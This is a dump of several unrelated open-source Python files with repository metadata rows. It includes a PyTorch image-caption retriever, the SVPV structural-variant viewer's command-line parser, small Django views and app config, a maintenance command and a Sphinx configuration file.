        model.load_state_dict(torch.load(cv_weight_file))
    return model
# def alexnet(pretrained=False, **kwargs):
# r"""AlexNet model architecture from the
# `"One weird trick..." <https://arxiv.org/abs/1404.5997>`_ paper.
# Args:
# pretrained (bool): If True, returns a model pre-trained on ImageNet
# """
# model = AlexNet(**kwargs)
# if pretrained:
# # model.load_state_dict(model_zoo.load_url(model_urls['alexnet']))
# model.load_state_dict(torch.load(CV_FILE))
# return model
class Text_Representer(nn.Module):
    """Encodes a padded batch of token-id sequences into a 256*6*6 vector
    (sized to match AlexNet's flattened conv features).

    Args:
        embedding_matrix: pre-loaded embedding weights; assumed to be an
            ``nn.Parameter`` of shape (vocab, dim) — TODO confirm at call
            sites (it is assigned directly to ``nn.Embedding.weight``).
    """

    def __init__(self, embedding_matrix):
        super(Text_Representer, self).__init__()
        self.embedding_matrix = embedding_matrix
        self.vocab_num, self.embed_dim = self.embedding_matrix.shape
        self.embedding = nn.Embedding(self.vocab_num, self.embed_dim)
        # Share the externally supplied (trainable) weights.
        self.embedding.weight = embedding_matrix
        self.gru = nn.GRU(input_size=self.embed_dim, hidden_size=256 * 6,
                          batch_first=True)
        self.linear = nn.Linear(in_features=256 * 6, out_features=256 * 6 * 6)

    def forward(self, sentence, length):
        embedded = self.embedding(sentence)
        packed = nn.utils.rnn.pack_padded_sequence(
            embedded, length, batch_first=True, enforce_sorted=False)
        # Keep only the final hidden state of the (single-layer) GRU.
        _, final_state = self.gru(packed)
        return self.linear(final_state[0])
class Cross_Modal_Retriever(nn.Module):
    """Joint image/text embedding model: an AlexNet feature extractor for
    images and a Text_Representer for captions, both projecting into the
    same 256*6*6 space."""

    def __init__(self, embedding_matrix, cv_weight_file=None):
        super(Cross_Modal_Retriever, self).__init__()
        self.cv_net = AlexNet(output_feat=True)
        if cv_weight_file:
            # Optionally warm-start the vision branch from a checkpoint.
            self.cv_net.load_state_dict(torch.load(cv_weight_file))
        self.nlp_net = Text_Representer(embedding_matrix=embedding_matrix)

    def forward(self, image, pos_caption, pos_length, neg_captions, neg_lengths):
        image_feats = self.cv_net(image)
        pos_feats = self.nlp_net(pos_caption, pos_length.view(-1))
        # Negatives arrive as (batch, n_neg, max_len); fold batch and
        # n_neg together for encoding, then restore the grouping.
        batch, n_neg, max_len = neg_captions.shape
        neg_feats = self.nlp_net(neg_captions.view(-1, max_len),
                                 neg_lengths.view(-1))
        neg_feats = neg_feats.view(batch, n_neg, -1)
        return image_feats, pos_feats, neg_feats
class TripletLoss(nn.Module):
    """Triplet loss with either a fixed margin or a soft margin.

    With ``margin`` set, the standard ``nn.TripletMarginLoss`` (p=2) is
    used. With ``margin=None``, the soft-margin formulation
    ``SoftMarginLoss(d(a, n) - d(a, p), 1)`` is applied instead.
    """

    def __init__(self, margin=None):
        super(TripletLoss, self).__init__()
        self.margin = margin
        if margin is None:  # no margin assigned -> soft margin
            self.Loss = nn.SoftMarginLoss()
        else:
            self.Loss = nn.TripletMarginLoss(margin=margin, p=2)

    def forward(self, anchor, pos, neg):
        if self.margin is not None:
            return self.Loss(anchor, pos, neg)
        # Soft margin: push d(anchor, neg) above d(anchor, pos).
        target = torch.ones(anchor.shape[0], 1).view(-1)
        if anchor.is_cuda:
            target = target.cuda()
        dist_pos = torch.norm(anchor - pos, 2, dim=1).view(-1)
        dist_neg = torch.norm(anchor - neg, 2, dim=1).view(-1)
        return self.Loss(dist_neg - dist_pos, target)
if __name__ == "__main__":
    # Smoke-test wiring for the retriever on a small local Flickr subset.
    flickr_root_dir = '/Users/jiangjunfeng/Desktop/coldog/worker/dataset/flickr_30k/flickr100'
    flickr_caption_filename = flickr_root_dir + '/results.token'
    flickr_image_dir = flickr_root_dir + '/flickr100-images'
    ##### debug: word-embedding section
    embedding_matrix, word2id_dict, _ = load_glove_embedding(GLOVE_FILE)
    # print(embedding_matrix.shape)
    ##### debug section
    retriever = Cross_Modal_Retriever(embedding_matrix=nn.Parameter(torch.tensor(embedding_matrix, dtype=torch.float),
                                                                    requires_grad=True),
                                      cv_weight_file=CV_FILE)
    dataset = Flickr_Dataset(flickr_caption_filename, flickr_image_dir, word2id_dict=word2id_dict)
    dataloader = torch.utils.data.DataLoader(dataset=dataset,
                                             batch_size=2,
                                             shuffle=True,
                                             num_workers=2)
    for step, (caption, image) in enumerate(dataloader):
        # NOTE(review): Cross_Modal_Retriever.forward is declared as
        # (image, pos_caption, pos_length, neg_captions, neg_lengths);
        # this two-argument call (and the caption/image order) looks
        # stale — verify against Flickr_Dataset before running.
        sim = retriever(caption, image)
        print(sim)
| [
"ubuntu@localhost.localdomain"
] | ubuntu@localhost.localdomain |
b934abe1ec9e66707f33db0e578efa609569191a | a80e25fda0f0ff496136af48e858b897e6b22b7a | /SVPV | 13708965340b19ca0b351ba26ca755aa65d46abd | [
"MIT"
] | permissive | Linhua-Sun/SVPV | 98a7f16f0fcdd6670bf9a41d2331fdf673dd5ec9 | d1c14842dc9dbcf43eb233fc9d55dcee3b30d228 | refs/heads/master | 2021-01-21T10:13:25.734026 | 2017-02-20T02:26:04 | 2017-02-20T02:26:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,204 | #!/usr/bin/env python
# # -*- coding: utf-8 -*-
# """
# author: Jacob Munro, Victor Chang Cardiac Research Institute
# """
from __future__ import print_function
import sys
import os
import re
from os.path import expanduser as expu
from svpv.vcf import VCFManager, BCFtools
from svpv.sam import SAMtools
from svpv.refgene import RefgeneManager
from svpv.plot import Plot
# Program version string and the start-up banner printed by __main__.
version = "1.00"
info = ("\t============================================\n"
        "\t|| Structural Variant Prediction Viewer ||\n"
        "\t|| Version {} ||\n"
        "\t============================================\n".format(version))
def main(argv=sys.argv):
    """Entry point: check the environment, parse *argv* and either launch
    the GUI or batch-plot every SV that passes the filters.

    NOTE: the default argument binds sys.argv at import time; callers may
    pass an explicit argument list instead (see example()).
    """
    try:
        # Require Python 2.7+ or any Python 3.
        assert (sys.version_info[0] == 2 and sys.version_info[1] >= 7) or (sys.version_info[0] > 2)
    except AssertionError:
        print("Error: python 2.7+ required. Please update your python installation.")
        exit(1)
    # Fail fast if the external tools are not installed.
    BCFtools.check_installation()
    SAMtools.check_installation()
    if '-example' in argv:
        example(argv)
    else:
        par = Params(argv)
        if not par.run.all:
            # Drop SV calls that none of the selected samples carry.
            par.run.vcf.remove_absent_svs(par.run.samples)
        if par.run.gui:
            import svpv.gui as GUI
            # Gene-list filtering is driven interactively in GUI mode.
            par.filter.gene_list_intersection = False
            GUI.main(par)
        else:
            svs = par.run.vcf.filter_svs(par.filter)
            for sv in svs:
                plot = Plot(sv, par.run.samples, par)
                plot.plot_figure(group=par.plot.grouping)
# Command-line help text printed on argument errors; kept as one string
# built from implicit literal concatenation across continuation lines.
usage = 'Usage example:\n' \
        'SVPV -vcf input_svs.vcf -samples sample1,sample2 -aln alignment1.bam,alignment2.sam\n -o /out/directory/\n'\
        '\nRun args:\n' \
        '[required]\n' \
        '-vcf\t\tPrimary structural variant prediction vcf/bcf file.\n' \
        '-aln\t\tComma separated list of alignment files (BAM/CRAM).\n' \
        '-samples\tComma separated list of samples to view,' \
        '\n\t\t\tnames must be the same as in vcf.\n' \
        '-o\t\tOutput directory.\n' \
        '[optional]\n' \
        '-gui\t\tRun in gui mode.\n' \
        '-ref_vcf\tReference structural variant vcf/bcf file for annotation.\n' \
        '-ref_gene\tRefseq genes file for annotation.\n' \
        '-manifest\tWhitespace delimited file with first column sample names and' \
        '\n\t\tsecond column alignment files.' \
        '\n\t\toverrides \'-samples\' and \'-aln\' if also given.\n' \
        '-fa\t\tReference genome Fasta file to add GC content annotation.\n' \
        '-separate_plots\tIndividual plots produced for each sample.\n' \
        '-l_svs\t\tshow SVs extending beyond the current plot area.\n' \
        '-disp\t\tPDF viewer command. GUI mode only.\n' \
        '\t\t\tdefault: "display"\n' \
        '-rd_len\t\tsequencing read length, optimises window size.\n' \
        '\t\t\tdefault: 100\n' \
        '-exp\t\twindow expansion, proportion of SV len added to each side.\n' \
        '\t\t\tdefault: 1\n' \
        '-bkpt_win\tbreakpoint window, number of read lengths to set windows around\n' \
        '\t\tbreakpoints.\n' \
        '\t\t\tdefault: 5\n' \
        '-n_bins\t\ttarget number of bins for plot window.\n' \
        '\t\t\tdefault: 100\n' \
        '\nFilter args:\n' \
        '-max_len\tmaximum length of structural variants (bp).\n' \
        '-min_len\tminimum length of structural variants (bp).\n' \
        '-af\t\tAllele frequency threshold: \n' \
        '\t\t\teg \'-af <0.1\' for SV with frequency less than 0.1.\n' \
        '-gts\t\tSpecify genotypes of given samples:' \
        '\n\t\t\teg \'-gts sample1:0/1,1/1;sample3:1/1\'.\n' \
        '-chrom\t\tRestrict to comma separated list of chromosomes.\n' \
        '-svtype\t\tRestrict to given SV type (DEL/DUP/CNV/INV).\n' \
        '-rgi\t\tRestrict to SVs that intersect refGenes, \'-ref_gene\' must be\n' \
        '\t\tsupplied.\n' \
        '-exonic\t\tRestrict to SVs that intersect exons of refGenes,' \
        '\n\t\t\'-ref_gene\' must be supplied.\n' \
        '\nPlot args:\n' \
        '-d\t0/[1]\tforce sequencing depth plot on or off.\n' \
        '-or\t0/[1]\tforce orphaned reads plot on or off.\n' \
        '-v\t0/[1]\tforce inverted pairs plot on or off.\n' \
        '-ss\t0/[1]\tforce same strand pairs plot on or off.\n' \
        '-cl\t0/[1]\tforce clipped reads plot on or off.\n' \
        '-se\t[0]/1\tforce SAM \'secondary alignment\' plot on or off.\n' \
        '-su\t[0]/1\tforce SAM \'supplementary alignment\' plot on or off.\n' \
        '-dm\t[0]/1\tforce mate different molecule alignment plot on or off.\n' \
        '-i\t0/[1]\tforce inferred insert size plot on or off.\n' \
        '-r\t0/[1]\tforce refgenes plot on or off.\n' \
        '-af\t0/[1]\tforce allele frequency plot on or off.\n' \
        '-l\t0/[1]\tforce plot legend on or off.\n'
def check_file_exists(path):
    """Abort the program (exit code 1) when *path* is not an existing
    regular file; otherwise do nothing."""
    if os.path.isfile(path):
        return
    print("Error: file does not exist!\n'%s'\n" % path)
    exit(1)
class Params:
    """Parses the command line into the three option groups used by the
    rest of the program: run settings (self.run), SV filtering
    (self.filter) and plotting switches (self.plot)."""

    def __init__(self, args):
        self.run = RunParams()
        self.filter = FilterParams(self)
        self.plot = PlotParams()
        self.ver = version
        for i, a in enumerate(args):
            if a[0] == '-':
                # FIX: '-all' is not listed in RunParams.valid, so the old
                # nested branch for it was unreachable and passing '-all'
                # aborted with "unrecognised argument". Handle it up front.
                if a == '-all':
                    self.run.all = True
                # set run parameters
                elif a in RunParams.valid:
                    if a == '-vcf':
                        self.run.set_vcfs(args[i + 1])
                    elif a == '-aln':
                        self.run.bams = args[i + 1].split(',')
                    elif a == '-samples':
                        self.run.samples = args[i + 1].split(',')
                    elif a == '-manifest':
                        if self.run.samples or self.run.bams:
                            print("samples and alignments provided as command line arguments overriden by manifest file\n")
                        self.run.read_samples_file(expu(args[i + 1]))
                    elif a == '-o':
                        self.run.out_dir = expu(args[i + 1])
                    elif a == '-gui':
                        self.run.gui = True
                    elif a == '-disp':
                        self.run.display = args[i + 1]
                    elif a == '-rd_len':
                        self.run.rd_len = int(args[i + 1])
                    elif a == '-exp':
                        self.run.expansion = float(args[i + 1])
                    elif a == '-bkpt_win':
                        self.run.bkpt_win = float(args[i + 1])
                    elif a == '-n_bins':
                        self.run.num_bins = int(args[i + 1])
                    elif a == '-fa':
                        check_file_exists(expu(args[i + 1]))
                        self.run.fa = expu(args[i + 1])
                    elif a == '-ref_gene':
                        self.run.ref_genes = RefgeneManager(args[i + 1])
                        self.filter.ref_genes = self.run.ref_genes
                    elif a == '-ref_vcf':
                        # Optionally given as 'name:file'.
                        if ':' in args[i + 1]:
                            check_file_exists(expu(args[i + 1].split(':')[1]))
                            self.run.ref_vcf = VCFManager(expu(args[i + 1].split(':')[1]), name=args[i + 1].split(':')[0], db_mode=True)
                        else:
                            check_file_exists(args[i + 1])
                            self.run.ref_vcf = VCFManager(args[i + 1], name='reference', db_mode=True)
                # set filter parameters
                # NOTE: '-af' appears in both FilterParams.valid and
                # PlotParams.valid; the filter interpretation wins here
                # (this matches the original parse order).
                elif a in FilterParams.valid:
                    # set max and min length filters
                    if a == '-max_len':
                        try:
                            self.filter.max_len = int(args[i + 1])
                        except ValueError:
                            print("invalid max length:" + args[i + 1])
                            exit(1)
                    elif a == '-min_len':
                        try:
                            self.filter.min_len = int(args[i + 1])
                        except ValueError:
                            print("invalid min length:" + args[i + 1])
                            exit(1)
                    # set allele frequency for filtering
                    elif a == '-af':
                        if '>' in args[i + 1]:
                            self.filter.AF_thresh_is_LT = False
                        try:
                            self.filter.AF_thresh = float(re.sub('[<>]', '', args[i + 1]))
                        except ValueError:
                            print(usage)
                            print("invalid allele frequency threshold: -af " + args[i+1])
                            exit(1)
                    # restrict to a single SV type
                    elif a == '-svtype':
                        if args[i+1].upper() in ('DEL', 'DUP', 'INV', 'CNV'):
                            self.filter.svtype = args[i+1].upper()
                        else:
                            print('invalid svtype %s' % args[i+1])
                            exit(1)
                    # switch for refgene intersections
                    elif a == '-rgi':
                        self.filter.RG_intersection = True
                    elif a == '-exonic':
                        self.filter.exonic = True
                    # list of genes reported SVs must intersect
                    elif a == '-gene_list':
                        # read in newline/whitespace delimited list of genes
                        self.filter.gene_list = []
                        for line in open(args[i + 1]):
                            for word in line.split():
                                self.filter.gene_list.append(word.strip().upper())
                        self.filter.gene_list_intersection = True
                    elif a == '-gts':
                        # specify genotypes of given samples in form: sample1:0/1,1/1;sample3:1/1
                        # FIX: reset the real attribute — the original
                        # assigned a misspelt 'sampleGTs' here and then
                        # populated 'sample_GTs' below.
                        self.filter.sample_GTs = {}
                        for sample in args[i + 1].split(';'):
                            self.filter.sample_GTs[sample.split(':')[0]] = sample.split(':')[1].split(',')
                    elif a == '-chrom':
                        self.filter.chrom = args[i + 1]
                # set plot parameters ('-x 0' forces a panel off, '-x 1' on)
                elif a in PlotParams.valid:
                    if a == '-d':
                        if (args[i + 1]) == '0':
                            self.plot.depth = False
                        elif (args[i + 1]) == '1':
                            self.plot.depth = True
                    elif a == '-or':
                        if (args[i + 1]) == '0':
                            self.plot.orphaned = False
                        elif (args[i + 1]) == '1':
                            self.plot.orphaned = True
                    elif a == '-v':
                        if (args[i + 1]) == '0':
                            self.plot.inverted = False
                        elif (args[i + 1]) == '1':
                            self.plot.inverted = True
                    elif a == '-ss':
                        if (args[i + 1]) == '0':
                            self.plot.samestrand = False
                        elif (args[i + 1]) == '1':
                            self.plot.samestrand = True
                    elif a == '-se':
                        if (args[i + 1]) == '0':
                            self.plot.secondary = False
                        elif (args[i + 1]) == '1':
                            self.plot.secondary = True
                    elif a == '-su':
                        if (args[i + 1]) == '0':
                            self.plot.supplementary = False
                        if (args[i + 1]) == '1':
                            self.plot.supplementary = True
                    elif a == '-dm':
                        if (args[i + 1]) == '0':
                            self.plot.diff_mol = False
                        if (args[i + 1]) == '1':
                            self.plot.diff_mol = True
                    elif a == '-cl':
                        if (args[i + 1]) == '0':
                            self.plot.clipped = False
                        elif (args[i + 1]) == '1':
                            self.plot.clipped = True
                    elif a == '-i':
                        if (args[i + 1]) == '0':
                            self.plot.ins = False
                        elif (args[i + 1]) == '1':
                            self.plot.ins = True
                    elif a == '-r':
                        if (args[i + 1]) == '0':
                            self.plot.refgene = False
                        elif (args[i + 1]) == '1':
                            self.plot.refgene = True
                    elif a == '-af':
                        if (args[i + 1]) == '0':
                            self.plot.sv_af = False
                        elif (args[i + 1]) == '1':
                            self.plot.sv_af = True
                    elif a == '-l':
                        if (args[i + 1]) == '0':
                            self.plot.legend = False
                        elif (args[i + 1]) == '1':
                            self.plot.legend = True
                    elif a == '-separate_plots':
                        self.plot.grouping = 1
                    # FIX: was "elif a == 'l_svs'" (missing leading dash),
                    # so the documented '-l_svs' flag was silently ignored.
                    elif a == '-l_svs':
                        self.plot.l_svs = True
                else:
                    print("unrecognised argument: " + a)
                    exit(1)
        self.run.check()
# class to store run parameters
class RunParams:
    """Run-level settings: input VCF/BAM sets, sample list, output paths
    and the window-sizing knobs passed through to plotting."""
    # NOTE(review): Params.__init__ also recognises '-all', which is not
    # listed in this tuple.
    valid = ('-vcf','-aln', '-samples', '-manifest', '-o', '-gui', '-ref_gene', '-ref_vcf', '-fa', '-rd_len',
             '-exp', '-bkpt_win', '-n_bins', '-disp')

    def __init__(self):
        # path to vcf
        self.vcf = None
        # set of alternate sv callsets to visualise against
        self.alt_vcfs = []
        # list of bams
        self.bams = []
        # list of samples
        self.samples = []
        # directory to write data to
        self.out_dir = None
        # switch for gui mode
        self.gui = False
        # refgene manager
        self.ref_genes = None
        # vcf for including population frequencies
        self.ref_vcf = None
        # include calls that are not present in samples
        self.all = False
        # reference genome fasta file
        self.fa = None
        # get configurations
        # include defaults in case they are accidentally deleted
        self.display = 'display'
        self.rd_len = 100
        self.expansion = 1
        self.bkpt_win = 5
        self.num_bins = 100

    def get_bams(self, samples):
        """Return the alignment files matching *samples*, preserving the
        sample order (positions are paired with self.samples)."""
        bams = []
        for s in samples:
            bams.append(self.bams[self.samples.index(s)])
        return bams

    def read_samples_file(self, filepath):
        """Load a whitespace-delimited manifest: column 1 sample name,
        column 2 alignment file. Lines with fewer than two fields are
        skipped; more than two is a fatal error."""
        check_file_exists(filepath)
        for line in open(filepath):
            if len(line.split()) > 2:
                print("Error: %d fields detected in manifest, expected 2.\n" % len(line.split()))
                exit(1)
            elif len(line.split()) < 2:
                continue
            self.samples.append(line.split()[0].strip())
            self.bams.append(line.split()[1].strip())
            check_file_exists(self.bams[-1])

    # set up the input vcfs (comma separated list, names included with colons name:file or file)
    def set_vcfs(self, vcfs_arg):
        """The first VCF becomes the primary callset (self.vcf); any
        further entries are stored as alternate callsets."""
        for sv_vcf in vcfs_arg.split(','):
            if ':' in sv_vcf:
                check_file_exists(expu(sv_vcf.split(':')[1]))
                vcf = VCFManager(expu(sv_vcf.split(':')[1]), name=sv_vcf.split(':')[0])
            else:
                check_file_exists(sv_vcf)
                vcf = VCFManager(sv_vcf)
            if self.vcf is None:
                self.vcf = vcf
            else:
                self.alt_vcfs.append(vcf)

    def check(self):
        """Validate the collected settings; exits with the usage text on
        any missing requirement, and drops samples absent from the VCF."""
        if not self.vcf:
            print(usage)
            print("Error: please specify a VCF file")
            exit(1)
        if not self.out_dir:
            print(usage)
            print("Error: please specify out directory")
            exit(1)
        if not self.samples:
            print(usage)
            print("Error: please specify samples to visualise")
            exit(1)
        if not self.bams:
            print(usage)
            print("Error: please specify BAM/SAM files")
            exit(1)
        if not len(self.bams) == len(self.samples):
            print(usage)
            print("Error:\nRequires same number of samples and alignments")
            exit(1)
        for b in self.bams:
            check_file_exists(b)
        # Remove (sample, bam) pairs whose sample id is not in the VCF;
        # delete by descending index so earlier positions stay valid.
        delete = []
        for i, s in enumerate(self.samples):
            if s not in self.vcf.samples:
                print("Sample ID not found in VCF: %s - removing from list" % s)
                delete.append(i)
        for i in sorted(delete, reverse=True):
            del self.samples[i]
            del self.bams[i]
# class to store parameters for filtering SVs from VCF
class FilterParams:
    """Holds the SV-filtering criteria parsed from the command line."""
    valid = ('-max_len', '-min_len', '-af', '-rgi', '-gene_list', '-gts', '-chrom', '-exonic', '-svtype')

    def __init__(self, parent):
        self.parent = parent
        # threshold for filtering AF
        self.AF_thresh = None
        # Allele Frequency threshold is less than
        self.AF_thresh_is_LT = True
        # specific chromosome/molecule/contig
        self.chrom = None
        # Dict of list of accepted genotypes for each sample for filtering
        # if sample is not in dict it is not filtered
        self.sample_GTs = {}
        # DEL/DUP/CNV/INV
        self.svtype = None
        # path to genes list file
        self.gene_list = []
        # switch for filtering by gene list
        self.gene_list_intersection = False
        # intersection with refgenes
        self.RG_intersection = False
        # filter SVs by length
        self.min_len = None
        self.max_len = None
        # pointer to refgenes
        self.ref_genes = None
        # filter for SVs that intersect exons only
        self.exonic = False
# class to store parameters for what to show in R plots
class PlotParams:
    """Switches controlling which panels the R plotting script draws."""
    valid = ('-d', '-or', '-v', '-ss', '-se', '-su', '-cl', '-i', '-r', '-af', '-l', '-gc', '-dm', '-separate_plots',
             '-l_svs')

    def __init__(self):
        self.gc = False
        self.depth = True
        self.orphaned = True
        self.inverted = True
        self.samestrand = True
        self.secondary = False
        self.supplementary = False
        self.clipped = True
        self.ins = True
        self.refgene = True
        self.sv_af = True
        self.legend = True
        self.diff_mol = True
        # samples per combined figure; '-separate_plots' sets this to 1
        self.grouping = 8
        # show SVs extending beyond the current plot area
        self.l_svs = False

    # command line arguments for calling Rscript
    def get_R_args(self):
        """Return the flag for every enabled panel, in the fixed order the
        R script expects (same order as the original if-chain)."""
        flag_map = (
            ('-d', self.depth),
            ('-or', self.orphaned),
            ('-v', self.inverted),
            ('-ss', self.samestrand),
            ('-se', self.secondary),
            ('-su', self.supplementary),
            ('-cl', self.clipped),
            ('-i', self.ins),
            ('-r', self.refgene),
            ('-af', self.sv_af),
            ('-l', self.legend),
            ('-gc', self.gc),
            ('-dm', self.diff_mol),
        )
        return [flag for flag, enabled in flag_map if enabled]
def example(argv):
    """Run SVPV on the bundled example data (three NA128xx partial BAMs
    and three caller VCFs); output goes to ~/svpv_output."""
    path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'example')
    if not os.path.exists(path):
        print('Error: example directory not found')
        exit(1)
    samples = {}
    samples['NA12877_S1'] = os.path.join(path, 'NA12877_S1.partial.bam')
    samples['NA12878_S1'] = os.path.join(path, 'NA12878_S1.partial.bam')
    samples['NA12884_S1'] = os.path.join(path, 'NA12884_S1.partial.bam')
    for s in samples:
        if not os.path.isfile(samples[s]):
            print('Error: example file not found.\n%s' % samples[s])
            exit(1)
    # Rebuild an argv for main(): keep everything except '-example' ...
    run_argv = []
    for a in argv:
        if not a == '-example':
            run_argv.append(a)
    # ... then append the example samples, alignments, callsets and output.
    run_argv.append('-samples')
    run_argv.append(','.join(samples.keys()))
    run_argv.append('-aln')
    run_argv.append(','.join(samples.values()))
    run_argv.append('-vcf')
    run_argv.append('Delly:{},CNVnator:{},Lumpy:{}'.format(os.path.join(path, 'delly.vcf'),
                                                           os.path.join(path, 'cnvnator.vcf'),
                                                           os.path.join(path, 'lumpy.vcf')))
    run_argv.append('-ref_vcf')
    run_argv.append('1000G:' + os.path.join(path, '1000G.vcf'))
    run_argv.append('-ref_gene')
    run_argv.append(os.path.join(path, 'hg38.refgene.partial.txt'))
    run_argv.append('-o')
    run_argv.append(os.path.join(os.path.expanduser("~"), 'svpv_output'))
    main(argv=run_argv)
    if '-gui' not in argv:
        print('\nSuccess!\n')
if __name__ == "__main__":
    # Print the banner, then hand over to the CLI entry point.
    print('\n{}'.format(info))
    main()
| [
"j.munro@victorchang.edu.au"
] | j.munro@victorchang.edu.au | |
4a8fa2aaff8f385966cf031d5fcfd0ab012dcd2e | b943573bc5591cc99c3dc902cf0d2c5c4dd8a84d | /sokoapp/deals/views.py | 499962adc60216ffb63bc316503953ccb34906cd | [
"MIT"
] | permissive | Mercy-Nekesa/sokoapp | b4141f51c430a3ac2378bbb906ccecaa8bef4fc7 | 6c7bc4c1278b7223226124a49fc33c5b8b6b617a | refs/heads/master | 2020-06-04T16:49:47.909730 | 2014-11-14T09:28:01 | 2014-11-14T09:28:01 | 26,276,861 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | import datetime
from django.shortcuts import render_to_response
from django.template import RequestContext
from deals.models import Deal, DealForm
def home(request):
    """Render the home page with the deals dated today.

    Deals are filtered on a 'YYYY-MM-DD' string, matching the original
    hand-built zero-padded format.
    """
    today_datetime = datetime.datetime.now()
    # strftime replaces the original manual month/day zero-padding
    # (string concatenation with '0' + str(...) for values 1-9).
    today = today_datetime.strftime('%Y-%m-%d')
    deals = Deal.objects.filter(date=today)
    return render_to_response("home.html", {'request': request, 'deals': deals, 'today_datetime': today_datetime}, context_instance=RequestContext(request))
def about_us(request):
    # TODO: unimplemented placeholder view.
    pass
def contact_us(request):
    # TODO: unimplemented placeholder view.
    pass
| [
"hungaiinc@gmail.com"
] | hungaiinc@gmail.com |
8de870f3af92cf92143f9d5164aeaa2dcdb4bc57 | baf9b3674cedea6ebf75f5b0f3618528bf385bb3 | /attibutes/apps.py | 77d00b6eb4a087fe9cbb6a96d52d148b7165a69f | [] | no_license | ElfKnell/spiridonis | 3377f73a23802017e3f97f4601bc3f8541c5cb0b | 95cb29f02ec9d0745b68520e520f80a45a618dca | refs/heads/master | 2023-07-06T15:39:09.985267 | 2021-08-17T11:59:12 | 2021-08-17T11:59:12 | 385,142,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | from django.apps import AppConfig
class AttibutesConfig(AppConfig):
    """App configuration for the 'attibutes' app.

    NOTE(review): 'attibutes' (sic) presumably mirrors the app package
    name on disk, so the spelling must not be "fixed" here in isolation.
    """
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'attibutes'
| [
"akyrych84@gmail.com"
] | akyrych84@gmail.com |
74f7d3abd0651251a5f4df57b6ba25d86f69998d | 4cca59f941adce8a2d71c00c0be5c06857f88dcc | /snisi_maint/management/commands/fix_61_meta_numbers.py | 0d0520383b86d61f2a23a6f0944abc86ea74c739 | [
"MIT"
] | permissive | brahimmade/snisi | 7e4ce8e35150f601dd7b800bc422edec2d13063d | b4d0292b3314023ec9c984b776eaa63a0a0a266f | refs/heads/master | 2023-05-07T19:04:04.895987 | 2017-12-29T18:58:22 | 2017-12-29T18:58:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import logging
from django.core.management.base import BaseCommand
from snisi_core.models.Periods import MonthPeriod
from snisi_core.models.Reporting import SNISIReport
logger = logging.getLogger(__name__)
class Command(BaseCommand):
    """One-off maintenance command for issue #61: refresh the expected
    reportings count stored on reports for the December 2014 period."""

    def handle(self, *args, **options):
        """Recompute and save the expected-reportings number on every
        casted SNISIReport of period 12-2014 that supports the recount."""
        logger.info("Issue #61. Wrong counts in Agg meta")
        period = MonthPeriod.from_url_str("12-2014")
        casted_reports = (r.casted()
                          for r in SNISIReport.objects.filter(period=period))
        for casted in casted_reports:
            # Only aggregated report types expose this recount helper.
            if hasattr(casted, 'update_expected_reportings_number'):
                logger.info(".{}".format(casted))
                casted.update_expected_reportings_number()
                casted.save()
        logger.info("done.")
| [
"rgaudin@gmail.com"
] | rgaudin@gmail.com |
f90bf58437dfe1b858c104b4f6836d327abe2bcb | e87a2da813838195f0b58e672e92e40724072af1 | /conf.py | 720ef966dee2efe771d6d888cf87609be0a7ac9c | [] | no_license | JhymerMartinez/SEDD_Manual_Del_Estudiante | 9c7e4301c75b6c14e0f8fa245cc582ac93cd8a9c | b2517fd3c81dff7b9efd553ff645e326aa69b778 | refs/heads/master | 2021-01-25T12:14:37.061368 | 2014-03-24T21:42:35 | 2014-03-24T21:42:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,847 | py | # -*- coding: utf-8 -*-
#
# SEDD_Manual_De_Usuario documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 13 15:30:07 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# Sphinx extensions enabled for this build.
# NOTE(review): 'rst2pdf.pdfbuilder' is a third-party extension (rst2pdf
# package) required by the pdf_documents builder configured below; both
# 'pngmath' and 'mathjax' are enabled, though normally one math renderer
# suffices -- confirm which one the project actually uses.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.intersphinx', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.pngmath',
    'sphinx.ext.mathjax', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode','rst2pdf.pdfbuilder']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'SEDD - Manual Del Estudiante'
copyright = u'2013, Ing. Milton Labanda, Jhymer Martínez'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = ''
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
